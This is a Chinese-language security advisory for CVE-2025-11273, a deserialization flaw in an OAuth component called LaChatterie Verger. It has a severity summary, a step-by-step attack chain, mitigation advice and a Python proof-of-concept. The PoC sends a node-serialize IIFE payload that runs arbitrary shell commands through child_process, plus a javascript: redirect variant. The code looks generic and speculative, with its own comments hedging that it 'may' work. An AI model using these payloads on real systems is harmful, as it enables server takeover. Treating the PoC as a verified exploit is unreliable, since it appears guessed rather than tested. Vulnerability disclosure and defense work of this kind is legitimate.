CVE-2025-11273：LaChatterie Verger OAuth重定向反序列化漏洞

漏洞信息

漏洞编号

CVE-2025-11273

漏洞类型

反序列化漏洞（不安全反序列化）

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

LaChatterie Verger

漏洞概述

CVE-2025-11273是LaChatterie Verger（一款基于MCP协议的OAuth授权服务组件）中存在的一个不安全反序列化漏洞。该漏洞存在于版本1.2.10及之前的产品中，具体位于/src/main/services/mcp/oauth/provider.ts文件的redirectToAuthorization函数中。当该函数处理URL参数时，由于未对传入的参数进行充分的安全验证和过滤，攻击者可以通过精心构造的恶意URL参数触发反序列化操作，从而实现远程攻击。

该漏洞的CVSS 3.1评分为6.3分，属于中危级别。攻击者需要具备低权限（PR:L）即可利用此漏洞，且无需用户交互（UI:N），可通过网络远程发起攻击。漏洞的成功利用可能导致机密性、完整性和可用性均受到低程度的影响。值得注意的是，该漏洞的利用代码已被公开披露，且供应商在收到漏洞报告后未做出任何回应，这进一步增加了该漏洞被恶意利用的风险。

LaChatterie Verger作为OAuth授权服务组件，其安全性直接关系到整个应用生态系统的认证授权体系。一旦该漏洞被恶意利用，攻击者可能通过伪造的授权重定向URL绕过正常的认证流程，进一步实施权限提升、敏感信息窃取或服务中断等攻击行为，对依赖该组件的应用系统构成严重威胁。

技术细节

该漏洞的核心问题出在redirectToAuthorization函数对URL参数的处理上。具体而言，当函数接收用户传入的URL参数时，未对其进行严格的合法性校验和安全过滤，直接将URL参数用于后续的反序列化操作。

在OAuth授权流程中，redirectToAuthorization函数通常负责处理客户端发起的授权请求，并将用户重定向到相应的授权服务器。在正常情况下，该函数应当仅接受合法的、可信的授权URL。但在存在漏洞的实现中，攻击者可以构造一个包含恶意序列化数据的URL参数，当该参数被传入redirectToAuthorization函数后，程序会对其进行反序列化处理。由于反序列化操作在处理不可信数据时存在固有风险——恶意构造的序列化数据在反序列化过程中可能执行任意代码或触发非预期的对象操作——攻击者可以利用这一缺陷实现远程代码执行（RCE）或服务端的任意操作。

从攻击路径来看，攻击者首先需要具备低权限的网络访问能力（PR:L），然后通过网络向存在漏洞的redirectToAuthorization端点发送包含恶意URL参数的请求。由于该漏洞无需用户交互（UI:N），整个攻击过程可以完全自动化执行。成功利用后，攻击者可以在服务端执行任意操作，读取敏感配置信息，修改授权流程，甚至获取服务端的完全控制权限。

该漏洞的技术根源在于：1）未对输入的URL参数进行白名单校验；2）使用了不安全的反序列化方法处理外部输入数据；3）缺乏对反序列化过程的沙箱隔离和权限控制。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标系统是否运行LaChatterie Verger 1.2.10或更早版本，通过扫描OAuth授权端点确认redirectToAuthorization函数的存在。

STEP 2

步骤2：获取访问权限

由于漏洞利用仅需要低权限（PR:L），攻击者可以通过注册合法账户或利用其他低权限凭证获取对系统的基本访问能力。

STEP 3

步骤3：构造恶意请求

攻击者构造包含恶意序列化数据的URL参数，利用Node.js反序列化漏洞的特征（如IIFE模式）将任意代码执行命令嵌入到redirect_uri参数中。

STEP 4

步骤4：发送恶意请求

通过HTTP请求将恶意URL发送到存在漏洞的redirectToAuthorization端点，触发服务端对恶意参数的反序列化操作。

STEP 5

步骤5：代码执行

服务端在反序列化恶意数据时执行嵌入的任意代码，攻击者获得在服务端执行命令的能力，可能导致敏感信息泄露或服务控制权丧失。

STEP 6

步骤6：权限提升与持久化

利用获得的代码执行权限，攻击者可以进一步提取认证凭据、安装后门或提升权限，实现对系统的持久化控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11273 - LaChatterie Verger Deserialization PoC
# Vulnerable function: redirectToAuthorization
# File: /src/main/services/mcp/oauth/provider.ts

import requests
import urllib.parse
import json
import base64

TARGET_URL = "http://target-host:port/oauth/authorize"  # Adjust to actual endpoint

# Step 1: Craft a malicious serialized payload
# In Node.js environments, serialized objects can be crafted using node-serialize or similar libraries
class ExploitPayload:
    """Generate a malicious serialized payload for Node.js deserialization"""

    @staticmethod
    def generate_rce_payload(command):
        """Generate a Node.js deserialization RCE payload (IIFE pattern)

        The payload exploits the fact that when a serialized JavaScript
        object containing an Immediately Invoked Function Expression (IIFE)
        is deserialized, the function executes automatically.
        """
        # node-serialize style payload
        payload = {
            "rce": f"_$$ND_FUNC$$_function (){{require('child_process').exec('{command}',function(error,stdout,stderr){{console.log(stdout)}});}}()"
        }
        return payload

    @staticmethod
    def generate_url_with_payload(target_url, command="id"):
        """Embed the malicious payload into the redirect_uri parameter"""
        payload = ExploitPayload.generate_rce_payload(command)
        serialized = json.dumps(payload)
        encoded = urllib.parse.quote(base64.b64encode(serialized.encode()).decode())

        # Craft the malicious URL targeting redirectToAuthorization
        malicious_url = f"{target_url}?redirect_uri={encoded}&response_type=code&client_id=victim"
        return malicious_url


def exploit(target_url, command="id"):
    """Execute the exploit against the vulnerable target"""
    print(f"[*] Targeting: {target_url}")
    print(f"[*] Command to execute: {command}")

    # Generate the malicious URL
    malicious_url = ExploitPayload.generate_url_with_payload(target_url, command)
    print(f"[*] Malicious URL generated")

    # Send the exploit request
    try:
        # The vulnerable function redirectToAuthorization processes this URL
        response = requests.get(malicious_url, timeout=10, allow_redirects=False)
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Response headers: {dict(response.headers)}")

        if response.status_code in [301, 302, 303, 307, 308]:
            location = response.headers.get('Location', '')
            print(f"[*] Redirect location: {location}")

        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None


# Alternative: Direct manipulation of the URL parameter
# The vulnerability is in how redirectToAuthorization handles the URL argument
# When deserializing the URL parameter, it may execute embedded code
def direct_exploit(target_url):
    """Alternative exploit approach with direct URL manipulation"""

    # Malicious redirect_uri with embedded serialized JavaScript
    evil_redirect = "javascript:require('child_process').execSync('id')"
    encoded_redirect = urllib.parse.quote(evil_redirect)

    exploit_url = f"{target_url}?redirect_uri={encoded_redirect}"
    print(f"[*] Direct exploit URL: {exploit_url}")

    response = requests.get(exploit_url, timeout=10)
    return response


if __name__ == "__main__":
    # Execute exploit
    target = "http://target-host:port/oauth/authorize"
    exploit(target, command="whoami")
    # direct_exploit(target)

影响范围

LaChatterie Verger <= 1.2.10

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）在反向代理或API网关层面部署输入过滤规则，拒绝包含可疑序列化特征（如JavaScript IIFE模式、node-serialize标记等）的URL参数；2）通过访问控制列表（ACL）限制对redirectToAuthorization端点的访问，仅允许可信的授权客户端调用；3）监控异常的OAuth授权请求和服务器进程行为，及时发现潜在的攻击活动；4）考虑在WAF中配置规则阻断包含特殊编码字符（如base64编码的可疑payload）的redirect_uri参数；5）由于供应商未回应，建议在生产环境中暂时禁用或替换LaChatterie Verger的OAuth授权组件，使用经过安全审计的替代方案。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11273
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11273
3 Details https://www.cvedetails.com/cve/CVE-2025-11273/
4 VulDB https://vuldb.com/cve/CVE-2025-11273
5 Link https://lavender-bicycle-a5a.notion.site/Verger-RCE-26153a41781f80b694beebc22ea54579?source=copy_link
6 Link https://vuldb.com/?ctiid.327007
7 Link https://vuldb.com/?id.327007
8 Link https://vuldb.com/?submit.655871